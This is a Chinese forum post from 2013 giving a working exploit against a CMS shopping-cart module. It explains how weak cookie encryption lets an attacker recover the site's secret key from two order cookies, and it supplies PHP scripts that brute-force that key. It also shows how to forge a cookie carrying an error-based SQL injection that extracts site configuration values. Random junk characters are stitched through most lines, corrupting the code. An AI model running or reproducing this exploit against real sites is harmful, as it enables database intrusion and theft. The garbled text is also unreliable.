www.xxx.com/plus/search.php?keyword=
4 Y0 S' ]; ~! i8 E4 Y在 include/shopcar.class.php中/ T, b5 ]! x9 f* V" r( o, u0 n! T( j. t
先看一下这个shopcar类是如何生成cookie的, s9 b! a$ h$ J
239 function saveCookie($key,$value)
- \ l# T1 X; r. t4 r" n240 {8 a+ ]. y& u& W6 Q" d! h7 U! q' V9 t( G
241 if(is_array($value))$ e5 e9 e$ M& g& L4 k) M
242 {
1 K [ [8 [2 a' B6 P, {+ `$ F243 $value = $this->enCrypt($this->enCode($value));
! Q; x5 @' p M# j% \* A244 }/ f7 p0 |5 w$ F: Y
245 else
9 a1 ^5 A# X' e( f246 {
3 c! ]# i# u8 I) L247 $value = $this->enCrypt($value);
4 E7 O6 |9 ]- u248 }( ]- V) k4 {' Q: N' g) K
249 setcookie($key,$value,time()+36000,’/');0 |7 Q6 c9 g: R; B5 x0 G( F
250 }! ]2 J+ q* n6 r* T2 }
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数( n9 [0 X ]1 H$ }
186 function enCrypt($txt)
6 c. U; v0 F( o7 D5 Z' |187 {
7 G _5 k% p; Z6 K7 t( m188 srand((double)microtime() * 1000000);
0 @/ S2 l1 B$ O! [* n5 a189 $encrypt_key = md5(rand(0, 32000));
- M* e* W7 B/ V- N7 A) h9 S5 k: D190 $ctr = 0;+ v- W0 d3 {: G
191 $tmp = ”;
( m" R7 {+ B- j. ]192 for($i = 0; $i < strlen($txt); $i++)
& r6 c1 c; l* i$ ^5 S193 {
7 Q; Q. j5 Z+ g4 W194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 o% O- J! g- p: h195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. p" C8 ~+ x) R H' M6 O* N9 D196 }
" Z- p4 @3 [9 l8 x197 return base64_encode($this->setKey($tmp));
- S- t. w" r3 U( V0 z! h. N% y$ I198 }% D. q7 Z# ?# C* i) |& U9 W) V
213 function setKey($txt), f8 `6 f& p1 m
214 {
: _5 \) B: o& r- R; `& J2 X) l f215 global $cfg_cookie_encode;5 g, [1 b" c- v1 ?( `3 N
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));" V. m4 q; u6 v/ R# z
217 $ctr = 0;
& u8 `7 B) h% L& S6 R218 $tmp = ”;/ Y+ q7 t$ N& k. A: p+ s, m
219 for($i = 0; $i < strlen($txt); $i++)# s- S7 y- t# d$ [: l7 j9 B
220 {
& g' Z$ v8 |( ^( A( X3 A221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% x' V9 B9 w' e q' j" |4 [# e
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" O. }. Z. \! c* O3 W
223 }0 ^: t% v9 ?% l& o4 p
224 return $tmp;7 W0 J$ N) M5 p9 w% P
225 }" ~* b& {/ ?& ?1 f
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
) W$ `# V* R9 x8 h然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。) j9 {) x7 u: T( M
具体代码如下:
/ X. t" i0 _/ ?6 ]! }1 ` ?$ j( W4 |<?php
$ T+ s# A% i8 p, W/ v* X6 n$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here" Y. Y3 [' t: c! i4 j8 r, j& ?) x; \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
7 k9 d# A" @% @8 v* K$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
* G8 }% t' D, ^: Z: Bfunction reStrCode($code,$string)
5 e* o% [" @4 S& ]- }+ l{
3 B- r5 W7 _3 G1 e r7 t$code = base64_decode($code);: ^! z d* j3 j
$key = “”;
$ \/ e8 u, [3 V# \for($i=0 ; $i<32 ; $i++); f' G' |: q( e& \) v
{% r% g( V9 e, p* C( [$ b
$key .= $string[$i] ^ $code[$i];
% B) q9 P0 ]$ ]( L2 Y}
; q8 Q/ W2 Y8 m/ S( [7 Xreturn $key;# R; M9 g3 B4 L( ~; ]9 w8 I
}
8 c; e2 h# k3 t1 z8 ffunction getKeys($cookie,$plantxt). N7 _4 j, ^: {* e* ]5 `3 c
{
1 F$ c0 t0 q; P" o$tmp = $cookie;
5 Z' u% L) m7 K" C$results = array();
( b, o; e# c5 T7 h% Yfor($j=0 ; $j < 32000; $j++)8 z4 j- y9 v/ j3 @5 ? d6 f9 q6 Y
{
/ ` M: ^4 b# m5 |0 b9 E; o7 U' y$ o( }& w
$txt = $plantxt;
' y: N+ F& `8 n0 k" ^, i$ctr = 0;6 R8 v3 F {' b9 G0 ^8 W7 I
$tmp = ”;
) P+ @; E3 [" u0 c, V5 Q- W& V: }$encrypt_key = md5($j);+ o) ?& G. {0 Q5 z* `$ I/ L
for($i =0; $i < strlen($txt); $i ++)$ O( ^6 g7 B! j8 E2 P
{
6 g" F$ I' Z: k" I* i$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ Z0 G) m6 ?% s% ?( Q+ ^ b
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
0 }3 {$ N* K2 S6 H}
/ K4 v. Q4 T& R: ?$ s6 W2 T$string = $tmp;
; T1 I$ B0 }5 {* V* x; Z$code = $cookie;# G+ p U/ b, Y4 S2 e
$result = reStrCode($code,$string);7 `$ u5 I& ?! i2 j- o
if(eregi(‘^[a-z0-9]+$’,$result)), `: G( L0 W- r, ^" e5 f, v4 q
{
% N4 g: O2 T. F5 eecho $result.”\n”;
$ F" C2 m; d% [: g# O4 [+ N8 P$results[] = $result;
$ f0 ~7 A/ b( D! V! y/ E8 e# z4 F) c}
+ y( O) D" X* L9 t3 t}# V5 T8 N* {# K9 O
return $results;
2 Y8 K5 T: A) d; [}) V& G3 H/ Y- Z3 W' s l6 _; L+ ~
$results1 = getKeys($cookie1,$plantxt);) T; L* ?& Q8 G) O! X+ M' x3 J
$results2 = getKeys($cookie2,$plantxt);
: s$ Y) @3 j1 ]8 T: jprint “\n——————–real key————————–\n”;+ Y' q' e; }! z- j# }. ]' _* i
foreach($results1 as $test1)
" o1 p! ?$ i8 ~{
Q& M8 Y6 W% l7 U' ]foreach($results2 as $test2)$ R, o# u6 }* [: t
{
' ^# g" W0 l/ g! ]0 `+ \$ Yif($test1 == $test2); i/ [. K) ^ N4 b5 X
{ d6 R3 J* t' p; Y, J* S0 F( U
echo $test1.”\n”;
( @" o1 [! K$ K/ E}
$ p9 N# `6 M: A5 ?6 n& b7 V}
- e* }" a( Y" x. @9 W" M" O, y0 {, s}$ d$ o) @; i% Y- u3 B6 M
?>6 M c: U; W, Y P
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,0 R0 {. W4 b( [' o2 c
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua15 p( g2 ^* |( o( I* n
然后推算出md5(strtolower($cfg_cookie_encode))( G* N% \( o0 z: w5 O
得到这个key之后,我们就可以构造任意购物车的cookie: L# ~5 |& ?7 r2 T/ t* X
接着看
6 B6 @* t" c) v/ V8 t20 class MemberShops
% r) m& M& U3 s) z0 g ? f21 {' k9 I5 Z+ P1 O0 X/ [
22 var $OrdersId;, Z% H/ K5 j9 K, v% }
23 var $productsId;" W3 c# G( l+ x: ^' Q
24
& L8 r! M6 M" ] y# Y25 function __construct()% ~( D% N# j4 `1 j+ h7 |* M
26 {
* }9 k) I2 N o$ p+ M* T! M5 F- ]27 $this->OrdersId = $this->getCookie(“OrdersId”);& `$ L. k# M9 ~2 V6 [
28 if(empty($this->OrdersId))
8 l) ^6 D* |( V+ E& G2 k29 {
' O- M1 T6 a" Q& M30 $this->OrdersId = $this->MakeOrders();
/ F$ f( b, b {7 \+ j% W$ S6 A31 }/ X: A( q6 u$ Y; F
32 }
' X) c! I5 e! n3 I发现OrderId是从cookie里面获取的: G1 j/ d5 U" P; t" ~/ m% v V Q
然后
. I* U( v7 P9 V3 n4 l2 q; W- D- x/plus/carbuyaction.php中的 Y2 p$ m& K, J8 I1 E9 l) ~
29 $cart = new MemberShops();
/ j$ @/ g# A0 v& B' E: p f; A39 $OrdersId = $cart->OrdersId; //本次记录的订单号+ R' j2 T7 y) }# c9 g U
……) e* G& n6 C2 G
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
- f( x9 I7 O8 h: ~6 Q' }接着我们就可以注入了
* m/ n' e7 \/ ~通过利用下面代码生成cookie:% Z; o6 S0 ?; K0 N' ?
<?php* z$ Y5 D4 x+ R6 g
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
5 ?$ L) _; k e3 _5 A% P$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here* x( i% H* b$ ~
function setKey($txt)2 h& E Z: L, e. X; {2 _
{4 x2 k/ l/ y ?( L6 \2 W! t
global $encrypt_key;4 m1 y; t0 y' d$ Q$ z) O( n
$ctr = 0;
' c6 z6 H% l9 s$tmp = ”;
2 q3 g6 U2 _% `! p }1 Pfor($i = 0; $i < strlen($txt); $i++)
g* i! A- B9 \' R. w& E- `2 s{
% v6 N7 [( |+ l U) s$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 P0 D) _( z3 u8 v% z9 Q
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];* T; C6 _9 q# P" m9 a5 U
}
- s/ j9 {0 U4 ^& M) _$ d zreturn $tmp;, W/ o+ u6 p9 E7 E& c0 s- \/ {
}
& E1 I# E: M7 h2 H' X; Vfunction enCrypt($txt), `9 Y" P5 ?$ \
{
! Q# P1 g+ H6 i& \+ ksrand((double)microtime() * 1000000);
" v% v* v9 G. ]1 |7 a$encrypt_key = md5(rand(0, 32000));
/ ~' k' a6 x8 s6 e" |2 ^% o" Y$ctr = 0;- ~" H. t2 e7 C" z' u
$tmp = ”;1 y4 ^, l3 D0 v# p; b
for($i = 0; $i < strlen($txt); $i++)
, ]( o7 O# Z, n( ]( Q. z/ t; x{ @* b8 H* `5 Y5 f& B5 H o
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
8 I+ t4 G- m! `$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);) i, V5 _( I* N5 R J; w+ E+ M
}/ K- P" {. \9 d/ N1 n3 J" j7 z) [
return base64_encode(setKey($tmp));. b& j: r7 H& H# H- c* G8 V0 _- n
}6 N+ I9 ^! z7 J" d- p
for($dest =0;$dest = enCrypt($txt);)* O- F4 z$ R. H* V; ~8 D3 Y
{8 b5 p- E* n0 u% W
if(!strpos($dest,’+'))# ]' J8 G( y) M5 E! p
{
4 y* a+ k% Z( g1 i5 ubreak;
( S A9 a9 X; S r9 z$ _( \# i' t}
3 Z5 E1 v" E1 d @' A3 ~. l}6 `/ V _) j) f+ A: O% o
echo $dest.”\n”;0 y; p2 m- N: x1 }4 i" Y, ]
?> f R$ y# [, g5 E
1 }5 u' i+ L. u7 i3 I |
发表于 2013-2-13 23:58:29
收藏
支持
反对